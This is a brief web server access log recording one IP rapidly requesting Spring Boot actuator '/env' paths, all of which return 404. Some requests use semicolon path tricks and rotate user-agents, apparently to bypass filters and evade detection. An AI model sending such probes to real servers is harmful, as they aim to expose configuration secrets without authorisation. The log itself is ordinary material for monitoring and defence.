194.50.16.252 - - [30/Apr/2025:01:49:45 +0200] "GET /actuator/env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0"
194.50.16.252 - - [30/Apr/2025:01:49:45 +0200] "GET /actuator;/env; HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
194.50.16.252 - - [30/Apr/2025:01:49:46 +0200] "GET /api;/actuator;/env; HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1"
194.50.16.252 - - [30/Apr/2025:01:49:46 +0200] "GET /api/env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
194.50.16.252 - - [30/Apr/2025:01:49:47 +0200] "GET /api/actuator/env HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.23"
